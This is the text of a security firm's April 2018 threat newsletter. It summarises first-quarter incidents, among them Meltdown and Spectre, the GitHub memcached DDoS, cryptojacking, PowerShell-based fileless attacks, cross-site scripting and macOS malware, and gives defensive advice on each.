CYBER SECURITYRISK RADARAPRIL 2018CONTENT1Executive summary2 New year, new hardware vulnerabilities and threats3 GitHub hit with biggest DDoS attack ever reported4 Modern-day gold rush: Cryptojacking goes mainstream5 Fileless attacks get a boost from PowerShell6 Cross-site scripting continues to call for patching7 MacOS loses its reputation as impenetrable fortress8 Quarterly report spotlight: ENISA

THE RISK RADAR APRIL 2018ExecutivesummaryThe first fiscal quarter of 2018 has drawn to a close, but notwithout leaving a trail of cyber security risks in its wake. Here’sa brief summary of them all: Meltdown and Spectre vulnerabilities continue togarner headlines as Microsoft and Intel work to patchremaining exploits. GitHub was hit with the biggest DDoS attack ever reported,yet managed to successfully recover in just 20 minutes. Hackers are increasingly latching onto cryptojackingthrough all means—software, fileless and browser plugins—asa way to monetise their efforts without having to pay for theirmining operation. Fileless attacks hit the Winter Olympics in South Korea,underscoring the danger of the authentic programs that canconceal malicious activity. Cross-site scripting was one of the most commonvulnerabilities among the 1,002 recorded vulnerabilities in thefirst annual Integrity360 2018 Penetration Testing Report. The perception that macOS users don’t have to worry aboutcyber threats has turned into a misconception, as researchershave recently seen an uptick in malware designed for theoperating system.Let’s take a closer look at the developments that cybersecurity analysts should monitor throughout 2018.1

THE RISK RADAR APRIL 2018New year,new hardwarevulnerabilitiesand threatsThe common vulnerabilities and exposures (CVEs)dubbed Meltdown and Spectre were revealed in earlyJanuary 2018, and dominated news headlines. The ideathat a kernel could be manipulated to deliver real datafrom a device has led to a number of patches fromMicrosoft and Intel as they try to solve the problem.Total Meltdown, a vulnerability stemming from a patchfor Meltdown, was discovered in late March. It affected alldevices running Windows 7 and Windows Server 2008R2, and points to the challenge these two problemsrepresent.In March 2018, it was announced that flaws were foundin processing chips that could potentially allowhackers to manipulate the devices they power.360 InsightThe risks point to the fact that sophisticatedhacking groups could leverage the exploits asthey become more common.One vector that attackers use to exploit thesevulnerabilities is virtualised hardware, which cangive them total access. Patching regularly, as wellas applying emergency patches, can help mitigateexposure.IT departments must be aware of any CVEsinvolving devices in use by the workforce, andadjust cyber security policies accordingly.2Meltdown,Spectreand CPUflawshighlight Q1hardwarerisks.

THE RISK RADAR APRIL 2018GitHub hit withbiggest DDoSattack everreportedThe popular software development platform, GitHub,suffered a massive distributed denial of service attackon February 28, 2018. Hackers sent an average of 1.35terabits per second (Tbps) of traffic to the website.Days later, a 1.7 Tbps reflection/amplification attacktargeted a customer of a US based Service Providerbased on the same attack vector that made up theGithub attack.GitHub was able to resolve the situation in less than 20minutes thanks to the DDoS mitigation platform it hadin place, while the 1.7 Tbps attack on the ServiceProvider customer reported no outages. Thissuccessful remediation is a sign of the tremendous shiftin opinion on cyber security strategies over the pasttwo years.360 InsightThese DDoS attacks were a result of exploitedvulnerabilities found in Memcached servers.They allowed the hackers to manipulate packetcommands sent to unprotected memory cachingsystems in a way that returned massive sets ofdata to the company’s website.The scale of the attacks could easily bring downvulnerable networks. Ensure that your DDoSprotection service level agreement explicitly stateshow quick the platform can respond to attacksto mitigate negative impacts, such as servicedisruption for clients. Every minute your website isdown may have a Financial and reputational costattached to it.3Hackerssent anaverageof 1.35Tbps oftraffic toGitHub.

THE RISK RADAR APRIL 2018Modern-daygold rush:Cryptojackinggoes mainstreamRising exchange rates for cryptocurrencies like Bitcoin havepushed cryptojacking to the forefront of hackers’ favouritemethodologies. As the spotlight on ransomware brightensgrows—and an unwillingness to pay cybercriminalsdevelops—hackers are turning to cryptojacking as a wayto slip into networks undetected and still generate afinancial profit from their activities. They accomplish thisthrough fileless attacks, ransomware and infected browserextensions.An average of 644,000 devices unknowingly hosted thesoftware programs each month between September 2017and January 2018, according to Microsoft. A single attackon March 6, 2018, saw a program named Dofoil infectover 500,000 computers in less than 12 hours. It was onlydiscovered in February that one hacker successfully minedover 3 million in a digital currency called Monero afterbeing undetected on Jenkins servers for 18 months.360 InsightCryptojacking presents both internal and externalrisks. If you find cryptominers on your network,you should be concerned that they were able toinfiltrate it in the first place. Similarly, employeeshave been found mining the cryptocurrenciesthrough their corporate PC, which can leave thecompany with elevated electricity bills and createfurther vulnerabilities on the network.Cyber security analysts should continue to monitortheir networks in real-time and build a whitelist forknown software programs so that they can quicklyidentify and isolate cryptojacking software.4Dofoilinfectedover500,000computersin less than12 hours.

THE RISK RADAR APRIL 2018Filelessattacks geta boost fromPowerShellThe popularity of fileless attacks has resulted in an uptickin frequency in 2018. A growing number of hackers areturning to PowerShell, the task automation scripting toolfrom Microsoft, to carry out their actions while hidingbehind the guise of legitimate actions.In February, 2018, Olympic officials reported that a cyberattack hit the Winter Olympics’ opening ceremony inPyeongchang, South Korea, Reuters reported. It was laterrevealed that hackers leveraged PowerShell to carry outthe attack, which impacted the organisation’s website andWiFi access that it had set up in the area.360 InsightMalicious activity concealed by authenticprograms can be detrimental to companies thatrely on signature-based detection mechanisms ashackers are able to easily modify their attack tobypass traditional security protocols.Real-time analysis through a security informationand event management platform will be a stapleof high-performing security information andevent management (SIEM) platform movingforward. It provides the visibility necessary tocorrelate potentially dangerous behaviour withcommon vulnerabilities and exposures.5Filelessattacks aregettinghelp fromlegitimateprogramslikePowerShell.

THE RISK RADAR APRIL 2018Cross-sitescriptingcontinuesto call forpatchingIntegrity360 penetration testers found cross-sitescripting to be the second most common vulnerabilityamong clients in 2017, just behind multiple SSLvulnerabilities.Developers like Adobe, Drupal and Microsoft have allreleased new patches as recently as March, 2018, withthe hopes to mitigate exposure. Although threat-levelseverity concerning cross-site scripting hovers aroundlow- to moderate-risk, the fact that it’s always on theirradar shows its pervasiveness as a challenge for cybersecurity professionals.360 InsightHackers use cross-site scripting to targetorganisations with simple or no defensemechanisms in place. These are commonlycompanies in the healthcare and financialindustries, where some businesses only seek tomeet compliance.Regular penetration testing, as well as threat andvulnerability assessments, can help enterprisesensure their website won’t contribute to a databreach through cross-site scripting.6Cross-sitescriptingwas thesecondmostcommonvulnerabilityfound in ourpenetrationtests

THE RISK RADAR APRIL 2018MacOSloses itsreputation asimpenetrablefortressIn the past, Mac computer users haven’t had to watchout for too many potential threats. In 2018 that’s turninginto a misconception—attacks on the operating systemincreased by roughly 270 percent in 2017, accordingto Malwarebytes. At least four new exploits have beendiscovered so far in Q1.Coldroot, a remote-access Trojan, was recently identifiedas a threat to Mac users in February, 2018. It’s inherentlylimited as it needs accessibility rights to performmalicious activities on a wide scale, but it was still ableto function as a hidden keylogger on many devices fornearly two years.360 InsightCompanies with a limited number of Mac usersmay have turned a blind eye on their activities tosupport other critical areas of the business, butthis shouldn’t be the case moving forward.MacOS should be incorporated into formalcyber security policies if it isn’t already; it’s anoverlooked endpoint that can allow a hacker freeentry to cause havoc on the network. SchedulemacOS build reviews to coincide with penetrationtesting services that will explicitly seek outvulnerabilities with the devices on your network.7Attackson Maccomputersincreased270 percentin 2017.

THE RISK RADAR APRIL 2018Quarterlyreportspotlight:ENISAThere’s never a dull moment in the cyber securityindustry, and the reason behind that is the great workbeing done behind the scenes to bring important issuesto the public spotlight.You won’t want to miss the latest report on the 2017cyber security threat landscape released by the EuropeanUnion Agency for Network and Information Security(ENISA).The report covers the most important trends and newsthat hit the industry in 2017, including what it views as thetop 15 threats to organisations in 2018. These are:1. Malware2. Web-based attacks3. Web application attacks4. Phishing5. Spam6. Denial of service7. Ransomware8. Botnets9. Insider threats10. Physical manipulation/damage/theft/loss11. Data breaches12. Identity theft13. Information leakage14. Exploit kits15. Cyber-espionageYou can find the rest of the ENISA 2017 ThreatLandscape Report here 8ENISAfoundmalware,web-basedattacksand webapplicationattacks tobe the threebiggestthreats tocompaniesin 2018.

HEAD OFFICE3rd Floor, Block D, The Concourse,Beacon Court, Sandyford, Dublin 18. 353 (0)1 293 4027LONDON OFFICE90 Long Acre,Covent Garden, London, WC2E 9RZ 44 203 397 3414BIRMINGHAM OFFICETS2 Pinewood Business Park,Coleshill Road, Birmingham, B37 7HG 44 203 397 3414NEW YORK OFFICE260 Madison Avenue, 8th FloorManhattan, 10016 1-212-461-3286

5 Fileless attacks get a boost from PowerShell 6 Cross-site scripting continues to call for patching 7 MacOS loses its reputation as impenetrable fortress 8 Quarterly report spotlight: . first annual Integrity360 2018 Penetration Testing Report. The perception that macOS users don't have to worry about cyber threats has turned into a .